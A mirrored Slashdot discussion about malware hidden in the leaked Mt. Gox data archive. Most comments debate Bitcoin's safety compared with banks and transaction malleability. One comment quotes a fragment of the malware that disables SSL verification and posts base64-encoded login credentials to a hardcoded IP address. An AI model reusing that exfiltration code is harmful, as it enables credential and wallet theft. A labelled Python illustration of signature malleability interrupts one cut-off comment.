Slashdot Mirror


Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

38 of 169 comments

  1. Really? by SternisheFan · · Score: 3, Funny

    Oh yes, I totally trust easily manipulated computer bits over paper money.

    1. Re:Really? by Anonymous Coward · · Score: 4, Interesting

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

    2. Re:Really? by SternisheFan · · Score: 2

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

    3. Re:Really? by ttucker · · Score: 4, Informative

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

    4. Re:Really? by Ralph+Wiggam · · Score: 4, Insightful

      How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

      When someone steals real money from a bank, it is insured by the FDIC.

      The impact is way, way worse with bitcoin.

    5. Re:Really? by SternisheFan · · Score: 3, Interesting

      Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy" hurdle.

    6. Re:Really? by bill_mcgonigle · · Score: 2

      Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)

    7. Re:Really? by zieroh · · Score: 2, Funny

      Real coin has worked for thousands of years.

      Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

      --
      People who say "sheeple" have about as much sophistication as an AOL user, and in fact are probably actually AOL users.

    8. Re:Really? by mysidia · · Score: 2, Insightful

      Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

      Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

      When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

      NOPE! And I assure you, this mode of payment is not thousands of years old.

      For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones. Chances are you didn't even put in "real dollars though" ---- you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything, because they were also most likely all paid by credit card, check or DD.

    9. Re:Really? by mysidia · · Score: 2

      Bitcoin has not proven itself to be a reliable way to store money.

      Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

      Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

      Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

    10. Re:Really? by mysidia · · Score: 2

      no bitcoin transactions are ever reversible.

      No cash transactions are ever reversible.

      [And Bitcoin is a form of cash.]
      There, fixed it for you.

    11. Re:Really? by sphealey · · Score: 3, Informative

      - - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

      Another cryptocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

      sPh

    12. Re:Really? by Kjella · · Score: 3, Informative

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      That's generally false for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to seize. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

      --
      Live today, because you never know what tomorrow brings

    13. Re:Really? by mysidia · · Score: 3, Informative

      When someone steals real money from a bank, it is insured by the FDIC.

      Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

      FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

      WP has some other examples of items not insured by the FDIC, also not covered:

      Investments backed by the U.S. government, such as US Treasury securities

      The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
      Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

      Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

      Insurance and annuity products, such as life, auto and homeowner's insurance.

    14. Re:Really? by mbkennel · · Score: 3, Insightful

      | Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

      Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

      Fiat currency is not "by fiat" automatically exchangeable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

      Bitcoin isn't by fiat exchangeable for anything either---it only has constructed scarcity.

      | The fed and the banks just will "federal reserve" monopoly bucks into existence.

      Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.

    15. Re:Really? by QilessQi · · Score: 5, Insightful

      As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

      The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

      If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

      Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

    16. Re:Really? by QilessQi · · Score: 5, Insightful

      And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

      Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

      Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

    17. Re: Really? by Gunboat_Diplomat · · Score: 2

      Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

      Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

    18. Re:Really? by TubeSteak · · Score: 2

      Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

      And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
      I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
      If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

      --
      [Fuck Beta]
      o0t!

    19. Re:Really? by ahabswhale · · Score: 3, Insightful

      lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bitcoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

      --
      Are agnostics skeptical of unicorns too?

    20. Re: Really? by mlts · · Score: 4, Insightful

      BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

      The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

    21. Re:Really? by ras · · Score: 3, Interesting

      As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

      Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted into the block chain, mtgox software didn't recognise them. Mtgox bug 3 was that they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

      But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must qualify for the Guinness Book of Records greatest accounting cluster fuck of all time.

      But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has ever been permanently lost because of such bugs.

      I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.

    22. Re:Really? by ras · · Score: 2

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      Only for some definition of "totally" that does mean 100% of transactions. And when you get to the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

      From http://www.globalgrainsvn.com/GGS/MT103.html:

      SWIFT MT-103

      SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

      How Do I Send A MT-103 ?

      An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

      Are MT-103s Reversible?

      No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

    23. Re:Really? by ttucker · · Score: 2

      This is totally false. Almost all bank transactions are reversible in the case of fraud

      A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

      Sure, I will help them figure out how to hire a lawyer. Or you can pass the message along.

    24. Re:Really? by QilessQi · · Score: 2

      Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... )

      Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow account.

      The site used a central escrow service to send bitcoins from buyers to sellers. The hackers exploited the transaction malleability bug – essentially a way users can mask transfers and ask for the same amount of BTC multiple times – to clean out this wallet. This is the same bug that forced Mt. Gox to halt all withdrawals and recent updates have made average bitcoin wallets secure against this sort of attack. According to the site, hackers used the Silk Road’s automatic transaction verification system to order from each other and then request refunds for unshipped goods. Hackers were able to use the transaction malleability bug because the Silk Road used only transaction ID to confirm the transfer of bitcoins. You can read more about the problem here.

      The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited. I think I can be forgiven for having confused one multimillion dollar Bitcoin loss with another caused by the same underlying problem. :-)

      But Mt.Gox and Silk Road 2 and every other incident is immaterial when taken individually. As I said in my post, let's leave that aside for a minute and focus on the real issue. I have seen people tying themselves in knots to defend Bitcoin exactly-as-is when that energy would be far better spent acknowledging the weakness in the ecosystem and laying out clear plans to eradicate them. Your own reply speaks about the Mt.Gox fiasco as if losing 350M to incompetence is somehow better than losing it to a targeted attack. The longer people deny the existence of these problems with the existing ecosystem, the longer it will take for cryptocurrencies to find a firm footing in the world. Which I think is a shame.

      Finally, as for your "tinfoil hat" comment.... save the name-calling for the conspiracy theorists, of which I am not one. I have only said what many have said already, that Bitcoin is not yet ready for adoption by the masses. It currently, currently, lacks the necessary economic infrastructure to be used safely and effectively by the public. I don't know why that easily-supported statement bruises so many feelings.

    25. Re: Really? by conquistadorst · · Score: 2

      Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

      Except nobody's paper wallet is connected to the internet, and few people carry significant hoards of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

      That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would probably be akin to someone leaving their cash in a safe, unattended, in an inconspicuous, publicly accessible place.

    26. Re:Really? by ras · · Score: 2

      I said that transaction malleability was exploited by hackers; it was.

      I thought I was pretty clear when I said it wasn't.

      The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

      Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

      The transaction malleability problem we are discussing here is actually about how the transaction signature is represented. As I said, there are other causes of malleability, some of which haven't been fixed. The transaction signature is particularly important because the bitcoin protocol uses it to identify the transaction. When used in that manner the same piece of information is called a transaction id. Because it does uniquely identify a transaction once it is accepted into the block chain bitcoin exchanges sometimes use the transaction id to match for transactions they have generated.

      The different ways of representing a transaction id doesn't affect the core operators of bitcoin, so it was never regarded as serious. The reason it didn't affect bitcoin is two otherwise identical transactions with different transaction id's look like a double spend. Naturally the bitcoin protocol rejects all but the first attempt, so it doesn't matter how many different transaction id's you throw at it. Bitcoin is based on the premise that there is one and only one true and correct transaction history – and that is the block chain. You can throw any rubbish you like at it (and there have been many attempts at DDOS it by doing just that), but as far as bitcoin is concerned the only transactions that exist are the ones that get appended to the block chain. So if there are transactions with multiple id's, it is the id that gets into the block chain that is the official one. The rest never happened.

      So far I expect this matches your understanding of the root cause of the problem. It is about now we depart from that.

      The transaction signature / id is an ECDSA signature. Here is a real one: 770a723381d3edbcbfd06cecdd7b9f8569e9691d3a06a8a9c8972dd6fcbc8493 . It looks remarkably like a fixed length SHA checksum doesn't it? It's not. An ECDSA signature is two large numbers, which in bitcoin is encoded in DER format. DER format is used because, quoting from that Wikipedia link: “DER is a subset of BER providing for exactly one way to encode an ASN.1 value the shortest possible length encoding must be used”. Which sort of begs the question “how can it be malleable”? It isn't. But, the software the reference bitcoin software uses to produce and decode these signatures is openssl, and like all good internet software openssl follows Postel's Law: “Be liberal in what you accept, and conservative in what you send”. So OpenSSL always generates valid bitcoin signatures, but it accepts invalid ones, and in particular numbers with leading zeros. Whether you call this a bug or feature is more a matter of taste than anything else.

      This bug / feature was noticed by the bitcoin developers some 3 years ago. It wasn't viewed as serious. As I said, it doesn'
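
An added example, not part of the original thread or of any Bitcoin software: a strict-DER check next to a liberal decoder of the kind the comment above describes, showing that a signature padded with a leading zero decodes to the same two numbers while a hash taken over the bytes that contain it changes. The values `R` and `S`, the `wrap` stand-in for a serialized transaction and all function names are constructed for illustration.

```python
import hashlib

# Constructed values: not a valid signature for any key; only the encoding matters here.
R = int("11" * 32, 16)
S = int("22" * 32, 16)


def der_int(value: int) -> bytes:
    """Shortest DER INTEGER body for a positive integer."""
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    return b"\x00" + body if body[0] & 0x80 else body


def encode_sig(r: int, s: int, pad_r: int = 0) -> bytes:
    """DER SEQUENCE of two INTEGERs; pad_r > 0 prepends superfluous zero bytes to r."""
    parts = b""
    for body in (b"\x00" * pad_r + der_int(r), der_int(s)):
        parts += b"\x02" + bytes([len(body)]) + body
    return b"\x30" + bytes([len(parts)]) + parts


def int_bodies(sig: bytes) -> list:
    """Structural parse shared by both decoders: the raw bytes of r and s."""
    if len(sig) < 8 or sig[0] != 0x30 or sig[1] != len(sig) - 2:
        raise ValueError("not a SEQUENCE of the stated length")
    pos, bodies = 2, []
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            raise ValueError("expected INTEGER")
        n = sig[pos + 1]
        body = sig[pos + 2 : pos + 2 + n]
        if n == 0 or len(body) != n:
            raise ValueError("bad INTEGER length")
        bodies.append(body)
        pos += 2 + n
    if pos != len(sig):
        raise ValueError("trailing bytes")
    return bodies


def parse_lenient(sig: bytes) -> tuple:
    """Liberal decoder (simplified model): padded integers are accepted."""
    r, s = (int.from_bytes(b, "big") for b in int_bodies(sig))
    return r, s


def is_strict_der(sig: bytes) -> bool:
    """Conservative check: only the single shortest encoding passes."""
    try:
        bodies = int_bodies(sig)
    except ValueError:
        return False
    for body in bodies:
        if body[0] & 0x80:  # would read as a negative number
            return False
        if len(body) > 1 and body[0] == 0 and not body[1] & 0x80:
            return False  # leading zero that is not needed
    return True


def wrap(sig: bytes) -> bytes:
    """Constructed stand-in for a serialized transaction that embeds the signature."""
    return b"constructed-prefix|" + sig + b"|constructed-suffix"


def txid_like(serialized: bytes) -> str:
    """Double SHA-256 over the bytes, shown byte-reversed as transaction ids are."""
    return hashlib.sha256(hashlib.sha256(serialized).digest()).digest()[::-1].hex()


def normalized_id(sig: bytes) -> str:
    """Identifier that ignores encoding: decode, re-encode canonically, then hash."""
    return txid_like(wrap(encode_sig(*parse_lenient(sig))))


if __name__ == "__main__":
    canonical, padded = encode_sig(R, S), encode_sig(R, S, pad_r=1)
    for name, sig in (("canonical", canonical), ("padded", padded)):
        print(name, len(sig), is_strict_der(sig),
              txid_like(wrap(sig))[:16], normalized_id(sig)[:16])
```

A system that matches payments on `txid_like` alone sees two different transactions here; one that rejects non-strict encodings, or matches on the normalized form, sees a single transaction.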

  2. This just gets better and better by VTBlue · · Score: 2

    This is becoming comical to the point of absurdity.

  3. Slowpoking hard, aren't we? by gustgr · · Score: 3, Insightful

    This was known minutes after the leak was released. You disappoint me, slashdot.

  4. Leak by gustgr · · Score: 5, Informative

    The leak is real, nonetheless. I found my balance and transactions there.

    1. Re:Leak by WinstonWolfIT · · Score: 2

      The data is publicly available.

    2. Re:Leak by Kjella · · Score: 2

      Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

      --
      Live today, because you never know what tomorrow brings

  5. Old news. by Janek+Kozicki · · Score: 3, Informative

    Coindesk already wrote about that almost two weeks ago!

    --
    #
    #\ @ ? Colonize Mars
    #

    1. Re:Old news. by rmdingler · · Score: 2

      We're like the Supreme Court here, Janek.

      If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

      --
      Happiness in intelligent people is the rarest thing I know.

      Ernest Hemingway

  6. Re:Censored content revealed by mythosaz · · Score: 2

    I'm mostly amused by the User-Agent:


          set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
          libURLSetSSLVerification false
          post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"

  7. Re: Really??? by rmdingler · · Score: 2

    Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

    turned out to be a house of phosphorous cards,

    and you don't see a red flag waving?

    Was your retirement locked up in there and now you find yourself too poor to pay attention?

    --
    Happiness in intelligent people is the rarest thing I know.

    Ernest Hemingway

  8. Not from the customer's point of view by Camael · · Score: 3, Insightful

    ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

    Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

    If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

    The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

  9. Different forms, same effect by Camael · · Score: 2

    There is zero counterfeit bitcoin. You can't say the same about paper currency.

    Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

    But can transactions involving bitcoins be counterfeited? Most certainly!

    Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

    Andreas M. Antonopoulos, chief security officer of digital wallet developer Blockchain, said the attacks work by flooding exchanges with a large number of malformed transactions that are similar, but not identical, to legitimate transactions that were already made. Exchanges that trust one or more of the fake records instead of the entries in the official Bitcoin blockchain quickly fall out of sync with the rest of the network and must recalculate their fund balances once the mistakes become apparent.

    The net effect is the same. Counterfeit paper currency deprives its holders of the value of that currency. Counterfeit bitcoin transactions deprive the owners of the bitcoins involved in that transaction of the value of those bitcoins.